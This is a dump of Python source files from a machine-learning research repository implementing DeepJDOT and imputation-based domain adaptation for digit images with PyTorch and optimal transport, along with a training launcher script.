"/src/models/digits/dann_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"]}
|
28,029
|
mkirchmeyer/adaptation-imputation
|
refs/heads/main
|
/src/models/digits/djdot_imput_digits.py
|
import torch
import torch.nn.functional as F
from itertools import cycle
from time import clock as tick
import torch.optim as optim
from experiments.launcher.config import DatasetConfig
from src.eval.utils_eval import evaluate_data_imput_classifier, compute_mse_imput
from src.models.digits.djdot_digits import dist_torch
import ot
import numpy as np
from src.plotting.utils_plotting import plot_data_frontier_digits
from src.utils.network import weight_init_glorot_uniform
from src.utils.utils_network import set_lr, get_models_imput
class DJDOTImput(object):
    """DeepJDOT domain adaptation with imputation of a masked input region.

    Each image is split into two horizontal bands via ``mask_1`` / ``mask_2``
    (the split row is ``crop_dim``). Two feature extractors encode the bands;
    a reconstructor imputes the band-2 features from the band-1 features so
    that target images (where band 2 is missing/masked) can still be
    classified. Alignment between source and target is done with optimal
    transport (``ot.emd``) on the concatenated features.

    Bug fix vs. the previous revision: ``self.n_class`` now honours the
    ``n_class`` constructor argument instead of being hard-coded to 10,
    matching ``DeepJDOT`` in ``djdot_digits.py``. The default remains 10, so
    existing callers are unaffected.

    NOTE(review): this module imports ``from time import clock as tick``;
    ``time.clock`` was removed in Python 3.8 — should likely be
    ``time.perf_counter``. The import lives outside this class, so it is
    only flagged here.

    NOTE(review): ``self.nb_epochs`` is not set in ``__init__``; callers are
    expected to call ``set_nbepoch(model, n)`` before ``fit()``.
    """

    def __init__(self, data_loader_train_s, data_loader_train_t, model_config, cuda=False, logger_file=None,
                 data_loader_test_s=None, data_loader_test_t=None, dataset=DatasetConfig(),
                 data_loader_train_s_init=None, n_class=10):
        # Data loaders: source/target train and test streams, plus a separate
        # source loader used only for the initialization (pre-training) phase.
        self.data_loader_train_s = data_loader_train_s
        self.data_loader_train_t = data_loader_train_t
        self.data_loader_test_t = data_loader_test_t
        self.data_loader_test_s = data_loader_test_s
        self.data_loader_train_s_init = data_loader_train_s_init
        # Fixed: previously hard-coded to 10, silently ignoring the argument.
        self.n_class = n_class
        self.cuda = cuda
        self.logger = logger_file
        # Row index at which the image is split into the two bands.
        self.crop_dim = int(dataset.im_size * model_config.crop_ratio)
        self.dataset = dataset
        # Ablation switches for the three auxiliary losses used during alignment.
        self.activate_adaptation_imp = model_config.activate_adaptation_imp
        self.activate_mse = model_config.activate_mse
        self.activate_adaptation_d1 = model_config.activate_adaptation_d1
        self.lr_decay_epoch = model_config.epoch_to_start_align
        self.lr_decay_factor = 0.5
        self.epoch_to_start_align = model_config.epoch_to_start_align
        self.model_config = model_config
        self.output_fig = model_config.output_fig
        self.initialize_model = model_config.initialize_model
        # If True, the imputation branch does not back-propagate into extractor 1.
        self.stop_grad = model_config.stop_grad
        self.alpha = model_config.djdot_alpha
        # Build all sub-networks; the two domain classifiers are created but
        # unused by this OT-based variant (kept for interface parity).
        feat_extractor1, feat_extractor2, data_classifier, domain_classifier1, domain_classifier2, reconstructor = \
            get_models_imput(model_config, n_class, dataset)
        feat_extractor1.apply(weight_init_glorot_uniform)
        feat_extractor2.apply(weight_init_glorot_uniform)
        data_classifier.apply(weight_init_glorot_uniform)
        domain_classifier1.apply(weight_init_glorot_uniform)
        domain_classifier2.apply(weight_init_glorot_uniform)
        reconstructor.apply(weight_init_glorot_uniform)
        self.feat_extractor1 = feat_extractor1
        self.feat_extractor2 = feat_extractor2
        self.data_classifier = data_classifier
        self.reconstructor = reconstructor
        if self.cuda:
            self.feat_extractor1.cuda()
            self.feat_extractor2.cuda()
            self.data_classifier.cuda()
            self.reconstructor.cuda()
        # One Adam optimizer per trainable module.
        self.optimizer_g1 = optim.Adam(self.feat_extractor1.parameters(), lr=model_config.init_lr)
        self.optimizer_g2 = optim.Adam(self.feat_extractor2.parameters(), lr=model_config.init_lr)
        self.optimizer_h = optim.Adam(self.reconstructor.parameters(), lr=model_config.init_lr)
        self.optimizer_data_classifier = optim.Adam(self.data_classifier.parameters(), lr=model_config.init_lr)
        self.init_lr = model_config.init_lr
        self.adaptive_lr = model_config.adaptive_lr

    def fit(self):
        """Train the model: optional supervised initialization on the source,
        then joint classification + OT alignment + imputation training.

        Requires ``self.nb_epochs`` to be set beforehand (via ``set_nbepoch``).
        """
        self.loss_history = []
        self.error_history = []
        # mask_1 keeps rows >= crop_dim, mask_2 keeps rows < crop_dim: the two
        # complementary horizontal bands of the image.
        self.mask_1 = torch.ones(size=(self.dataset.channel, self.dataset.im_size, self.dataset.im_size))
        self.mask_2 = torch.ones(size=(self.dataset.channel, self.dataset.im_size, self.dataset.im_size))
        if self.cuda:
            self.mask_1 = self.mask_1.cuda()
            self.mask_2 = self.mask_2.cuda()
        self.mask_1[:, :self.crop_dim, :] = 0.0
        self.mask_2[:, self.crop_dim:, :] = 0.0
        if self.initialize_model:
            # Phase 1: plain supervised pre-training on the (full) source data.
            self.logger.info("Initialize model")
            for epoch in range(self.epoch_to_start_align):
                self.feat_extractor1.train()
                self.feat_extractor2.train()
                self.data_classifier.train()
                tic = tick()
                for batch_idx, (X_batch_s, y_batch_s) in enumerate(self.data_loader_train_s_init):
                    y_batch_s = y_batch_s.view(-1)
                    self.feat_extractor1.zero_grad()
                    self.feat_extractor2.zero_grad()
                    self.data_classifier.zero_grad()
                    if self.cuda:
                        X_batch_s = X_batch_s.cuda()
                        y_batch_s = y_batch_s.cuda()
                    X_batch_s1 = torch.mul(X_batch_s, self.mask_1)
                    X_batch_s2 = torch.mul(X_batch_s, self.mask_2)
                    size = X_batch_s.size()
                    output_feat_s1 = self.feat_extractor1(X_batch_s1)
                    output_feat_s2 = self.feat_extractor2(X_batch_s2)
                    # Classify on the concatenation of both band features.
                    output_class_s = self.data_classifier(torch.cat((output_feat_s1, output_feat_s2), 1))
                    loss = F.cross_entropy(output_class_s, y_batch_s)
                    loss.backward()
                    self.optimizer_g1.step()
                    self.optimizer_g2.step()
                    self.optimizer_data_classifier.step()
                toc = tick() - tic
                self.logger.info("\nTrain epoch: {}/{} {:2.2f}s \tLoss: {:.6f} Dist_loss:{:.6f}".format(
                    epoch, self.nb_epochs, toc, loss.item(), 0))
                if epoch % 5 == 0 and epoch != 0:
                    evaluate_data_imput_classifier(self, is_test=True, is_target=False)
                    evaluate_data_imput_classifier(self, is_test=True, is_target=True)
                self.loss_history.append(loss.item())
                self.error_history.append(loss.item())
            start_epoch = self.epoch_to_start_align
            self.logger.info(f"Finished initializing with batch size: {size}")
        else:
            start_epoch = 0
        if self.output_fig and start_epoch != 0:
            plot_data_frontier_digits(self, self.data_loader_test_s, self.data_loader_test_t, "djdot_imput_10",
                                      is_imput=True)
        # Phase 2: joint training with OT alignment and imputation losses.
        self.logger.info("Start aligning")
        for epoch in range(start_epoch, self.nb_epochs):
            self.feat_extractor1.train()
            self.feat_extractor2.train()
            self.data_classifier.train()
            self.reconstructor.train()
            tic = tick()
            # cycle() lets the (possibly shorter) target loader wrap around.
            self.T_batches = cycle(iter(self.data_loader_train_t))
            for batch_idx, (X_batch_s, y_batch_s) in enumerate(self.data_loader_train_s):
                y_batch_s = y_batch_s.view(-1)
                # p in [0, 1): training progress, drives lr decay and grad_scale ramp-up.
                p = (batch_idx + (epoch - start_epoch) * len(self.data_loader_train_s)) / (
                        len(self.data_loader_train_s) * (self.nb_epochs - start_epoch))
                if self.adaptive_lr:
                    # Annealing schedule from the DANN paper: lr = lr0 / (1 + 10p)^0.75
                    lr = self.init_lr / (1. + 10 * p) ** 0.75
                    set_lr(self.optimizer_g1, lr)
                    set_lr(self.optimizer_g2, lr)
                    set_lr(self.optimizer_h, lr)
                    set_lr(self.optimizer_data_classifier, lr)
                self.feat_extractor1.zero_grad()
                self.feat_extractor2.zero_grad()
                self.data_classifier.zero_grad()
                self.reconstructor.zero_grad()
                X_batch_t, _ = next(self.T_batches)
                if self.cuda:
                    X_batch_t = X_batch_t.cuda()
                    X_batch_s = X_batch_s.cuda()
                    y_batch_s = y_batch_s.cuda()
                X_batch_s1 = torch.mul(X_batch_s, self.mask_1)
                X_batch_s2 = torch.mul(X_batch_s, self.mask_2)
                # Only band 1 of the target is observed.
                X_batch_t1 = torch.mul(X_batch_t, self.mask_1)
                output_feat_s1 = self.feat_extractor1(X_batch_s1)
                output_feat_s2 = self.feat_extractor2(X_batch_s2)
                # Gradient ramp-up from 0 to 1 (DANN schedule) applied to the OT losses.
                self.grad_scale = 2. / (1. + np.exp(-10 * p)) - 1
                if self.stop_grad:
                    # Detach the imputation path from extractor 1 by re-encoding without grad.
                    with torch.no_grad():
                        output_feat_s1_da = self.feat_extractor1(X_batch_s1)
                else:
                    output_feat_s1_da = output_feat_s1
                output_feat_s2_imputed_da = self.reconstructor(output_feat_s1_da)
                # -----------------------------------------------------------------
                # source classification
                # -----------------------------------------------------------------
                output_class_s = self.data_classifier(torch.cat((output_feat_s1, output_feat_s2), 1))
                loss = F.cross_entropy(output_class_s, y_batch_s)
                error = loss
                # -----------------------------------------------------------------
                # DJDOT domain classif
                # -----------------------------------------------------------------
                if self.activate_adaptation_d1:
                    # OT between source (real band1 + imputed band2) and target
                    # (real band1 + imputed band2) joint features.
                    output_feat_t1 = self.feat_extractor1(X_batch_t1)
                    reconstructed_t1 = self.reconstructor(output_feat_t1)
                    M1 = self.alpha * dist_torch(torch.cat((output_feat_s1, output_feat_s2_imputed_da), 1),
                                                 torch.cat((output_feat_t1, reconstructed_t1), 1))
                    gamma1 = torch.from_numpy(ot.emd(ot.unif(2 * output_feat_s1.size(0)),
                                                     ot.unif(2 * output_feat_t1.size(0)),
                                                     M1.cpu().detach().numpy())).float()
                    if self.cuda:
                        gamma1 = gamma1.cuda()
                    dist_loss1 = torch.sum(gamma1 * M1) * self.grad_scale
                    error += dist_loss1
                else:
                    dist_loss1 = torch.zeros(1)
                # -----------------------------------------------------------------
                # Imputation
                # -----------------------------------------------------------------
                # Adaptation Imput: OT between imputed and true band-2 features.
                if self.activate_adaptation_imp:
                    M2 = self.alpha * dist_torch(output_feat_s2_imputed_da, output_feat_s2)
                    gamma2 = torch.from_numpy(ot.emd(ot.unif(output_feat_s2_imputed_da.size(0)),
                                                     ot.unif(output_feat_s2.size(0)),
                                                     M2.cpu().detach().numpy())).float()
                    if self.cuda:
                        gamma2 = gamma2.cuda()
                    dist_loss2 = torch.sum(gamma2 * M2) * self.grad_scale
                    error += dist_loss2
                else:
                    dist_loss2 = torch.zeros(1)
                # MSE Imput: direct L2 between imputed and true band-2 features.
                if self.activate_mse:
                    dist_loss_mse = torch.dist(output_feat_s2, output_feat_s2_imputed_da, 2)
                    error += dist_loss_mse
                else:
                    dist_loss_mse = torch.zeros(1)
                error.backward()
                self.optimizer_data_classifier.step()
                self.optimizer_h.step()
                self.optimizer_g1.step()
                self.optimizer_g2.step()
            toc = tick() - tic
            self.logger.info("\nTrain epoch: {}/{} {:2.2f}s \tLoss: {:.6f} Dist_loss1:{:.6f} Dist_loss2:{:.6f} "
                             "Dist_lossMSE:{:.6f}".format(epoch, self.nb_epochs, toc, loss.item(), dist_loss1.item(),
                                                          dist_loss2.item(), dist_loss_mse.item()))
            self.loss_history.append(loss.item())
            self.error_history.append(error.item())
            if epoch % 5 == 0 and epoch != 0:
                # evaluate_data_imput_classifier(self, is_test=True, is_target=False)
                evaluate_data_imput_classifier(self, is_test=True, is_target=True)
                compute_mse_imput(self, is_target=True)
                compute_mse_imput(self, is_target=False)
        # Final evaluation; results are stored as attributes read by the launcher.
        self.loss_test_s, self.acc_test_s, _, _ = evaluate_data_imput_classifier(self, is_test=True, is_target=False)
        self.loss_test_t, self.acc_test_t, _, _ = evaluate_data_imput_classifier(self, is_test=True, is_target=True)
        compute_mse_imput(self, is_target=True)
        compute_mse_imput(self, is_target=False)
        if self.output_fig:
            plot_data_frontier_digits(self, self.data_loader_test_s, self.data_loader_test_t, "djdot_imput_100",
                                      is_imput=True)
|
{"/src/eval/utils_eval.py": ["/src/utils/utils_network.py"], "/experiments/launcher/criteo_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/criteo/dann_criteo.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/models/digits/djdot_digits.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/experiments/launcher/digits_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/digits/dann_imput_digits.py", "/src/models/digits/djdot_imput_digits.py", "/src/models/digits/djdot_digits.py", "/src/utils/utils_network.py"], "/src/plotting/utils_plotting.py": ["/src/utils/utils_network.py"], "/experiments/__init__.py": ["/experiments/launcher/experiments_criteo.py", "/experiments/launcher/experiments_mnist_mnistm.py"], "/src/dataset/utils_dataset.py": ["/src/dataset/dataset_criteo.py", "/experiments/launcher/config.py", "/src/dataset/sampler.py"], "/src/models/criteo/dann_criteo.py": ["/src/eval/utils_eval.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/utils/utils_network.py": ["/src/utils/network.py"], "/orchestration/launcher.py": ["/experiments/__init__.py"], "/src/dataset/dataset_criteo.py": ["/src/dataset/sampler.py"], "/src/models/digits/dann_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"]}
|
28,030
|
mkirchmeyer/adaptation-imputation
|
refs/heads/main
|
/src/models/digits/djdot_digits.py
|
from time import clock as tick
import torch
from experiments.launcher.config import DatasetConfig
from src.eval.utils_eval import evaluate_data_classifier
from src.plotting.utils_plotting import plot_data_frontier_digits
from src.utils.network import weight_init_glorot_uniform
from src.utils.utils_network import set_lr, get_optimizer, get_models
import torch.nn.functional as F
import ot
from itertools import cycle
dtype = 'torch.FloatTensor'  # NOTE(review): appears unused in this module — confirm before removing
class DeepJDOT(object):
    """DeepJDOT baseline: source classification plus optimal-transport
    alignment (``ot.emd``) between source and target feature distributions.

    NOTE(review): this module imports ``from time import clock as tick``;
    ``time.clock`` was removed in Python 3.8 — likely needs ``perf_counter``.

    NOTE(review): ``self.nb_epochs`` is not set here; callers must invoke
    ``set_nbepoch(model, n)`` before ``fit()``.
    """

    def __init__(self, data_loader_train_s, data_loader_train_t, model_config,
                 cuda=False, logger_file=None, data_loader_test_s=None, data_loader_test_t=None,
                 dataset=DatasetConfig(), n_class=10, data_loader_train_s_init=None):
        self.data_loader_train_s = data_loader_train_s
        self.data_loader_train_t = data_loader_train_t
        self.data_loader_test_s = data_loader_test_s
        self.data_loader_test_t = data_loader_test_t
        self.data_loader_train_s_init = data_loader_train_s_init
        self.cuda = cuda
        # Weight on the OT ground-cost matrix.
        self.alpha = model_config.djdot_alpha
        self.epoch_to_start_align = model_config.epoch_to_start_align  # start aligning distrib from this step
        self.lr_decay_epoch = model_config.epoch_to_start_align
        self.lr_decay_factor = 0.5
        # If set, the source is masked the same way as the target (band 1 only).
        self.adapt_only_first = model_config.adapt_only_first
        # crop_dim == 0 means "no masking" (upper-bound experiment with full images).
        self.crop_dim = 0 if model_config.upper_bound and not self.adapt_only_first else \
            int(dataset.im_size * model_config.crop_ratio)
        self.dataset = dataset
        self.output_fig = model_config.output_fig
        self.n_class = n_class
        self.initialize_model = model_config.initialize_model
        self.model_config = model_config
        feat_extractor, data_classifier, _ = get_models(model_config, n_class, dataset)
        feat_extractor.apply(weight_init_glorot_uniform)
        data_classifier.apply(weight_init_glorot_uniform)
        self.feat_extractor = feat_extractor
        self.data_classifier = data_classifier
        if self.cuda:
            self.feat_extractor.cuda()
            self.data_classifier.cuda()
        self.optimizer_feat_extractor, self.optimizer_data_classifier, _ = get_optimizer(model_config, self)
        self.init_lr = model_config.init_lr
        self.adaptive_lr = model_config.adaptive_lr
        self.logger = logger_file

    def fit(self):
        """Train: optional supervised initialization, then joint
        classification + OT-alignment training."""
        self.loss_history = []
        self.error_history = []
        if self.crop_dim != 0:
            # mask_t zeroes the top crop_dim rows (the band missing on the target).
            self.mask_t = torch.ones(size=(self.dataset.channel, self.dataset.im_size, self.dataset.im_size))
            if self.cuda:
                self.mask_t = self.mask_t.cuda()
            self.mask_t[:, :self.crop_dim, :] = 0.0
        if self.initialize_model:
            # Phase 1: plain supervised pre-training on the source.
            self.logger.info("Initialize DJDOT")
            for epoch in range(self.epoch_to_start_align):
                self.feat_extractor.train()
                self.data_classifier.train()
                tic = tick()
                for batch_idx, (X_batch_s, y_batch_s) in enumerate(self.data_loader_train_s_init):
                    y_batch_s = y_batch_s.view(-1)
                    self.feat_extractor.zero_grad()
                    self.data_classifier.zero_grad()
                    if self.cuda:
                        X_batch_s = X_batch_s.cuda()
                        y_batch_s = y_batch_s.cuda()
                    size = X_batch_s.size()
                    if self.adapt_only_first:
                        # Train on source masked like the target.
                        X_batch_s = torch.mul(X_batch_s, self.mask_t)
                    output_feat_s = self.feat_extractor(X_batch_s)
                    output_class_s = self.data_classifier(output_feat_s)
                    loss = F.cross_entropy(output_class_s, y_batch_s)
                    loss.backward()
                    self.optimizer_feat_extractor.step()
                    self.optimizer_data_classifier.step()
                toc = tick() - tic
                self.logger.info("\nTrain epoch: {}/{} {:2.2f}s \tLoss: {:.6f} Dist_loss:{:.6f}".format(
                    epoch, self.nb_epochs, toc, loss.item(), 0))
                if epoch % 5 == 0 and epoch != 0:
                    evaluate_data_classifier(self, is_test=True, is_target=False)
                    evaluate_data_classifier(self, is_test=True, is_target=True)
                self.loss_history.append(loss.item())
                self.error_history.append(loss.item())
            start_epoch = self.epoch_to_start_align
            self.logger.info(f"Finished initializing with batch size: {size}")
        else:
            start_epoch = 0
        if self.output_fig:
            if start_epoch != 0:
                plot_data_frontier_digits(self, self.data_loader_test_s, self.data_loader_test_t, "djdot_10")
        # Phase 2: classification + OT alignment.
        self.logger.info("Start aligning")
        for epoch in range(start_epoch, self.nb_epochs):
            self.feat_extractor.train()
            self.data_classifier.train()
            tic = tick()
            # cycle() lets the target loader wrap around the (longer) source loader.
            self.T_batches = cycle(iter(self.data_loader_train_t))
            for batch_idx, (X_batch_s, y_batch_s) in enumerate(self.data_loader_train_s):
                y_batch_s = y_batch_s.view(-1)
                self.feat_extractor.zero_grad()
                self.data_classifier.zero_grad()
                # Training progress p in [0, 1), drives the lr annealing below.
                p = (batch_idx + (epoch - start_epoch) * len(self.data_loader_train_s)) / (
                        len(self.data_loader_train_s) * (self.nb_epochs - start_epoch))
                if self.adaptive_lr:
                    # DANN-style schedule: lr = lr0 / (1 + 10p)^0.75
                    lr = self.init_lr / (1. + 10 * p) ** 0.75
                    set_lr(self.optimizer_feat_extractor, lr)
                    set_lr(self.optimizer_data_classifier, lr)
                X_batch_t, _ = next(self.T_batches)
                if self.cuda:
                    X_batch_t = X_batch_t.cuda()
                    X_batch_s = X_batch_s.cuda()
                    y_batch_s = y_batch_s.cuda()
                if self.crop_dim != 0:
                    X_batch_t = torch.mul(X_batch_t, self.mask_t)
                    if self.adapt_only_first:
                        X_batch_s = torch.mul(X_batch_s, self.mask_t)
                # Source Domain Data : forward feature extraction + data classifier
                output_feat_s = self.feat_extractor(X_batch_s)
                output_class_s = self.data_classifier(output_feat_s)
                loss = F.cross_entropy(output_class_s, y_batch_s)
                # compute distribution distance
                if epoch >= self.epoch_to_start_align:
                    g_batch_s = self.feat_extractor(X_batch_s)
                    g_batch_t = self.feat_extractor(X_batch_t)
                    # Ground cost = alpha * pairwise squared distances; gamma = exact OT plan.
                    M = self.alpha * dist_torch(g_batch_s, g_batch_t)
                    gamma = torch.from_numpy(ot.emd(ot.unif(g_batch_s.size(0)),
                                                    ot.unif(g_batch_t.size(0)),
                                                    M.cpu().detach().numpy())).float()
                    if self.cuda:
                        gamma = gamma.cuda()
                    dist_loss = torch.sum(gamma * M)
                    error = loss + dist_loss
                else:
                    error = loss
                    dist_loss = torch.zeros(1)
                error.backward()
                self.optimizer_feat_extractor.step()
                self.optimizer_data_classifier.step()
            toc = tick() - tic
            self.logger.info("\nTrain epoch: {}/{} {:2.2f}s \tLoss: {:.6f} Dist_loss:{:.6f}".format(
                epoch, self.nb_epochs, toc, loss.item(), dist_loss.item()))
            if epoch % 5 == 0 and epoch != 0:
                evaluate_data_classifier(self, is_test=True, is_target=False)
                evaluate_data_classifier(self, is_test=True, is_target=True)
            self.loss_history.append(loss.item())
            self.error_history.append(error.item())
        # Final evaluation; attributes are read by the launcher scripts.
        self.loss_test_s, self.acc_test_s, _, _ = evaluate_data_classifier(self, is_test=True, is_target=False)
        self.loss_test_t, self.acc_test_t, _, _ = evaluate_data_classifier(self, is_test=True, is_target=True)
        if self.output_fig:
            plot_data_frontier_digits(self, self.data_loader_test_s, self.data_loader_test_t, "djdot_100")
def dist_torch(x1, x2):
    """Pairwise squared Euclidean distances between the rows of two matrices.

    Uses the identity ||a - b||^2 = ||a||^2 + ||b||^2 - 2 a.b, letting
    broadcasting build the (n1, n2) distance matrix.
    """
    sq_norms_1 = x1.pow(2).sum(1).unsqueeze(1)   # (n1, 1)
    sq_norms_2 = x2.pow(2).sum(1).unsqueeze(1)   # (n2, 1)
    cross = torch.mm(x1, x2.t())                 # (n1, n2)
    return sq_norms_1 + sq_norms_2.t() - 2 * cross
|
{"/src/eval/utils_eval.py": ["/src/utils/utils_network.py"], "/experiments/launcher/criteo_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/criteo/dann_criteo.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/models/digits/djdot_digits.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/experiments/launcher/digits_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/digits/dann_imput_digits.py", "/src/models/digits/djdot_imput_digits.py", "/src/models/digits/djdot_digits.py", "/src/utils/utils_network.py"], "/src/plotting/utils_plotting.py": ["/src/utils/utils_network.py"], "/experiments/__init__.py": ["/experiments/launcher/experiments_criteo.py", "/experiments/launcher/experiments_mnist_mnistm.py"], "/src/dataset/utils_dataset.py": ["/src/dataset/dataset_criteo.py", "/experiments/launcher/config.py", "/src/dataset/sampler.py"], "/src/models/criteo/dann_criteo.py": ["/src/eval/utils_eval.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/utils/utils_network.py": ["/src/utils/network.py"], "/orchestration/launcher.py": ["/experiments/__init__.py"], "/src/dataset/dataset_criteo.py": ["/src/dataset/sampler.py"], "/src/models/digits/dann_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"]}
|
28,031
|
mkirchmeyer/adaptation-imputation
|
refs/heads/main
|
/experiments/launcher/digits_binary.py
|
# Launcher script: trains one of four adaptation models (DANN, DeepJDOT, and
# their imputation variants) on a digits source=>target pair and logs metrics.
import random
import numpy as np
import torch
import time
from experiments.launcher.config import Config, dummy_model_config
from src.dataset.utils_dataset import create_dataset
from src.models.digits.dann_imput_digits import DANNImput
from src.models.digits.dann_digits import DANN
from src.models.digits.djdot_imput_digits import DJDOTImput
from src.models.digits.djdot_digits import DeepJDOT
from src.utils.utils_network import create_logger, set_nbepoch, create_log_name
n_class = 10  # digit classes 0-9
debug = False  # set True to run with the lightweight dummy config instead of CLI args
if debug:
    config = dummy_model_config
    in_memory = False
else:
    config = Config.get_config_from_args()
    in_memory = True
# Seed every RNG source with the same seed for reproducibility.
# python RNG
random.seed(config.model.random_seed)
# pytorch RNGs
torch.manual_seed(config.model.random_seed)
torch.backends.cudnn.deterministic = True
if torch.cuda.is_available():
    torch.cuda.manual_seed_all(config.model.random_seed)
# numpy RNG
np.random.seed(config.model.random_seed)
cuda = torch.cuda.is_available()
if cuda:
    torch.cuda.set_device(config.run.gpu_id)
name = create_log_name("digits", config)
# NOTE(review): assumes a ./results/ directory exists relative to the working dir — confirm
logger = create_logger(f"./results/{name}.log")
logger.info(f"config: {config}")
logger.info("####################")
logger.info(f"{config.model.source} => {config.model.target}")
logger.info("===DATA===")
data_loader_train_s, data_loader_test_s, data_loader_train_t, data_loader_test_t, data_loader_train_s_init = \
    create_dataset(config, "../..", in_memory=in_memory, is_balanced=config.model.is_balanced)
n_dim = (len(data_loader_train_s.dataset), 10)  # NOTE(review): n_dim appears unused below — confirm before removing
n_instances_train_s = len(data_loader_train_s.dataset)
n_instances_train_t = len(data_loader_train_t.dataset)
logger.info(f"n_instances_train_s: {n_instances_train_s}")
logger.info(f"n_instances_train_t: {n_instances_train_t}")
final_metrics = {
    "source_classif": dict(),
    "target_classif": dict()
}
start_time = time.time()
# NOTE(review): if config.model.mode matches none of the four branches below,
# `model` is never bound and the metric collection raises NameError — confirm intended.
if config.model.mode == "dann":
    logger.info("===DANN===")
    logger.info(f"upper_bound: {config.model.upper_bound}")
    model = DANN(data_loader_train_s, data_loader_train_t, model_config=config.model, cuda=cuda,
                 data_loader_test_s=data_loader_test_s, data_loader_test_t=data_loader_test_t, dataset=dataset,
                 data_loader_train_s_init=data_loader_train_s_init, logger_file=logger, n_class=n_class)
    set_nbepoch(model, config.training.n_epochs)
    model.fit()
if config.model.mode == "djdot":
    logger.info("===DEEPJDOT===")
    logger.info(f"distance: {config.model.mode}")
    logger.info(f"upper_bound: {config.model.upper_bound}")
    model = DeepJDOT(data_loader_train_s, data_loader_train_t, model_config=config.model, cuda=cuda,
                     data_loader_test_t=data_loader_test_t, data_loader_test_s=data_loader_test_s, logger_file=logger,
                     data_loader_train_s_init=data_loader_train_s_init, dataset=dataset, n_class=n_class)
    set_nbepoch(model, config.training.n_epochs)
    model.fit()
if config.model.mode == "dann_imput":
    logger.info("===DANN IMPUT===")
    logger.info(f"upper_bound: {config.model.upper_bound}")
    model = DANNImput(data_loader_train_s, data_loader_train_t, model_config=config.model, cuda=cuda,
                      data_loader_train_s_init=data_loader_train_s_init, data_loader_test_s=data_loader_test_s,
                      data_loader_test_t=data_loader_test_t, dataset=dataset, n_class=n_class, logger_file=logger)
    set_nbepoch(model, config.training.n_epochs)
    model.fit()
if config.model.mode == "djdot_imput":
    logger.info("===Djdot IMPUT===")
    logger.info(f"upper_bound: {config.model.upper_bound}")
    model = DJDOTImput(data_loader_train_s, data_loader_train_t, model_config=config.model, cuda=cuda,
                       data_loader_test_s=data_loader_test_s, data_loader_test_t=data_loader_test_t,
                       dataset=dataset, data_loader_train_s_init=data_loader_train_s_init, n_class=n_class,
                       logger_file=logger)
    set_nbepoch(model, config.training.n_epochs)
    model.fit()
# Test metrics are attributes set by model.fit()
final_metrics["source_classif"] = {
    "test_loss": model.loss_test_s,
    "test_acc": model.acc_test_s
}
final_metrics["target_classif"] = {
    "test_loss": model.loss_test_t,
    "test_acc": model.acc_test_t
}
if config.model.mode == "dann":
    # single domain discriminator
    final_metrics["domain"] = {
        "test_loss": model.loss_d_test,
        "test_acc": model.acc_d_test
    }
elif config.model.mode.find("dann_imput") != -1:
    # imputation variant trains two domain discriminators
    final_metrics["domain1"] = {
        "test_loss": model.loss_d1_test,
        "test_acc": model.acc_d1_test
    }
    final_metrics["domain2"] = {
        "test_loss": model.loss_d2_test,
        "test_acc": model.acc_d2_test
    }
final_metrics["elapsed_time"] = time.time() - start_time
final_metrics["status"] = "completed"
logger.info(final_metrics)
|
{"/src/eval/utils_eval.py": ["/src/utils/utils_network.py"], "/experiments/launcher/criteo_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/criteo/dann_criteo.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/models/digits/djdot_digits.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/experiments/launcher/digits_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/digits/dann_imput_digits.py", "/src/models/digits/djdot_imput_digits.py", "/src/models/digits/djdot_digits.py", "/src/utils/utils_network.py"], "/src/plotting/utils_plotting.py": ["/src/utils/utils_network.py"], "/experiments/__init__.py": ["/experiments/launcher/experiments_criteo.py", "/experiments/launcher/experiments_mnist_mnistm.py"], "/src/dataset/utils_dataset.py": ["/src/dataset/dataset_criteo.py", "/experiments/launcher/config.py", "/src/dataset/sampler.py"], "/src/models/criteo/dann_criteo.py": ["/src/eval/utils_eval.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/utils/utils_network.py": ["/src/utils/network.py"], "/orchestration/launcher.py": ["/experiments/__init__.py"], "/src/dataset/dataset_criteo.py": ["/src/dataset/sampler.py"], "/src/models/digits/dann_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"]}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.